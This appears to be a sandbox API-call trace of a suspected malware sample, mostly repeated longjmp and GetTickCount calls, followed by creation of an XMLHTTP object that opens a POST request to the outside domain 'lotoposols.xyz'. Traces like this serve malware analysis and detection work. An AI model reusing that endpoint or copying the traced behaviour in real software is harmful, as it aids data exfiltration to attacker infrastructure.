	[0120.102] longjmp () 
	[0120.102] longjmp () 
	[0120.102] longjmp () 
	[0120.102] longjmp () 
	[0120.102] longjmp () 
	[0120.103] longjmp () 
	[0120.103] longjmp () 
	[0120.103] longjmp () 
	[0120.103] longjmp () 
	[0120.103] longjmp () 
	[0120.103] longjmp () 
	[0120.104] longjmp () 
	[0120.104] longjmp () 
	[0120.104] longjmp () 
	[0120.104] longjmp () 
	[0120.104] longjmp () 
	[0120.104] longjmp () 
	[0120.105] GetTickCount () returned 0x115517b
	[0120.105] longjmp () 
	[0120.105] longjmp () 
	[0120.105] longjmp () 
	[0120.105] longjmp () 
	[0120.105] longjmp () 
	[0120.106] longjmp () 
	[0120.106] longjmp () 
	[0120.106] longjmp () 
	[0120.106] longjmp () 
	[0120.106] longjmp () 
	[0120.106] longjmp () 
	[0120.106] longjmp () 
	[0120.107] longjmp () 
	[0120.107] longjmp () 
	[0120.107] longjmp () 
	[0120.107] longjmp () 
	[0120.107] longjmp () 
	[0120.107] longjmp () 
	[0120.107] longjmp () 
	[0120.107] longjmp () 
	[0120.108] longjmp () 
	[0120.108] longjmp () 
	[0120.108] longjmp () 
	[0120.108] longjmp () 
	[0120.108] longjmp () 
	[0120.108] longjmp () 
	[0120.108] longjmp () 
	[0120.109] longjmp () 
	[0120.109] longjmp () 
	[0120.109] longjmp () 
	[0120.109] longjmp () 
	[0120.109] longjmp () 
	[0120.109] GetTickCount () returned 0x115518a
	[0120.109] longjmp () 
	[0120.110] longjmp () 
	[0120.110] longjmp () 
	[0120.110] longjmp () 
	[0120.110] longjmp () 
	[0120.110] longjmp () 
	[0120.110] longjmp () 
	[0120.110] longjmp () 
	[0120.111] longjmp () 
	[0120.111] longjmp () 
	[0120.111] longjmp () 
	[0120.111] longjmp () 
	[0120.111] longjmp () 
	[0120.111] longjmp () 
	[0120.111] longjmp () 
	[0120.111] longjmp () 
	[0120.112] longjmp () 
	[0120.112] longjmp () 
	[0120.112] longjmp () 
	[0120.112] longjmp () 
	[0120.112] longjmp () 
	[0120.112] longjmp () 
	[0120.113] longjmp () 
	[0120.113] longjmp () 
	[0120.113] longjmp () 
	[0120.113] longjmp () 
	[0120.113] longjmp () 
	[0120.113] longjmp () 
	[0120.113] longjmp () 
	[0120.113] longjmp () 
	[0120.114] longjmp () 
	[0120.114] longjmp () 
	[0120.114] GetTickCount () returned 0x115518a
	[0120.114] longjmp () 
	[0120.114] longjmp () 
	[0120.114] longjmp () 
	[0120.114] longjmp () 
	[0120.114] longjmp () 
	[0120.115] longjmp () 
	[0120.115] longjmp () 
	[0120.115] longjmp () 
	[0120.115] longjmp () 
	[0120.115] longjmp () 
	[0120.115] longjmp () 
	[0120.115] longjmp () 
	[0120.116] longjmp () 
	[0120.116] longjmp () 
	[0120.116] longjmp () 
	[0120.116] longjmp () 
	[0120.116] longjmp () 
	[0120.116] longjmp () 
	[0120.116] longjmp () 
	[0120.116] longjmp () 
	[0120.117] longjmp () 
	[0120.117] longjmp () 
	[0120.117] longjmp () 
	[0120.117] longjmp () 
	[0120.117] longjmp () 
	[0120.117] longjmp () 
	[0120.117] longjmp () 
	[0120.118] longjmp () 
	[0120.118] longjmp () 
	[0120.118] longjmp () 
	[0120.118] longjmp () 
	[0120.118] longjmp () 
	[0120.118] GetTickCount () returned 0x115518a
	[0120.118] longjmp () 
	[0120.119] longjmp () 
	[0120.119] longjmp () 
	[0120.119] longjmp () 
	[0120.119] longjmp () 
	[0120.119] longjmp () 
	[0120.119] longjmp () 
	[0120.120] longjmp () 
	[0120.120] longjmp () 
	[0120.120] longjmp () 
	[0120.120] longjmp () 
	[0120.120] longjmp () 
	[0120.120] longjmp () 
	[0120.121] longjmp () 
	[0120.121] longjmp () 
	[0120.121] longjmp () 
	[0120.121] longjmp () 
	[0120.121] longjmp () 
	[0120.122] longjmp () 
	[0120.122] longjmp () 
	[0120.122] longjmp () 
	[0120.122] longjmp () 
	[0120.122] longjmp () 
	[0120.122] longjmp () 
	[0120.124] longjmp () 
	[0120.124] longjmp () 
	[0120.124] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x26d970 | out: lpclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0120.124] SysStringLen (param_1=0x0) returned 0x0
	[0120.124] CoGetClassObject (in: rclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26d940 | out: ppv=0x26d940*=0x7fef40bac20) returned 0x0
	[0120.125] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef40bac20, riid=0x7fef9156380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x26d948 | out: ppvObject=0x26d948*=0x0) returned 0x80004002
	[0120.125] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef40bac20, pUnkOuter=0x0, riid=0x7fef914ccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d930 | out: ppvObject=0x26d930*=0x47a5aa0) returned 0x0
	[0120.125] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef40bac20) returned 0x1
	[0120.125] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef91563b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26d908 | out: ppvObject=0x26d908*=0x47a5b88) returned 0x0
	[0120.125] ??2@YAPEAX_K@Z () returned 0x3cacc0
	[0120.125] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x47a5b88, pUnkSite=0x3cacc0) returned 0x0
	[0120.125] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d678 | out: ppvObject=0x26d678*=0x0) returned 0x80004002
	[0120.125] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d680 | out: ppvObject=0x26d680*=0x0) returned 0x80004002
	[0120.125] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0120.125] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d860 | out: ppvObject=0x26d860*=0x3cacc0) returned 0x0
	[0120.125] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c680 | out: ppvObject=0x26c680*=0x3cacc0) returned 0x0
	[0120.125] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c6b8 | out: ppvObject=0x26c6b8*=0x0) returned 0x80004002
	[0120.125] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26c6a8 | out: ppvObject=0x26c6a8*=0x0) returned 0x80004002
	[0120.125] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0120.125] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0120.125] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0120.126] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0120.126] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c768 | out: ppvObject=0x26c768*=0x0) returned 0x80004002
	[0120.126] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c750 | out: ppvObject=0x26c750*=0x3cacc0) returned 0x0
	[0120.126] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c780 | out: ppvObject=0x26c780*=0x0) returned 0x80004002
	[0120.126] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0120.126] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0120.126] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0120.126] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0120.126] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0120.126] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d878 | out: ppvObject=0x26d878*=0x3cacc0) returned 0x0
	[0120.126] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d870 | out: ppvObject=0x26d870*=0x0) returned 0x80004002
	[0120.126] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0120.126] XMLHTTPRequest:IUnknown:Release (This=0x47a5b88) returned 0x0
	[0120.126] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d918 | out: ppvObject=0x26d918*=0x47a5aa0) returned 0x0
	[0120.126] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0120.127] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0120.127] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0120.127] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0120.127] GetTickCount () returned 0x115519a
	[0120.127] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0120.127] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=1) returned 0x0
	[0120.129] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0120.129] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0120.129] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=1, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0120.130] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce18 | out: ppvObject=0x26ce18*=0x0) returned 0x80004002
	[0120.130] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce20 | out: ppvObject=0x26ce20*=0x0) returned 0x80004002
	[0120.130] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0120.130] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d000 | out: ppvObject=0x26d000*=0x3cacc0) returned 0x0
	[0120.130] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26be20 | out: ppvObject=0x26be20*=0x3cacc0) returned 0x0
	[0120.130] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be58 | out: ppvObject=0x26be58*=0x0) returned 0x80004002
	[0120.130] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26be48 | out: ppvObject=0x26be48*=0x0) returned 0x80004002
	[0120.130] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0120.130] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0120.130] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0120.130] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0120.130] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf08 | out: ppvObject=0x26bf08*=0x0) returned 0x80004002
	[0120.131] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26bef0 | out: ppvObject=0x26bef0*=0x3cacc0) returned 0x0
	[0120.131] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf20 | out: ppvObject=0x26bf20*=0x0) returned 0x80004002
	[0120.131] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0120.131] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0120.131] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0120.131] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0120.131] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0120.131] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d018 | out: ppvObject=0x26d018*=0x3cacc0) returned 0x0
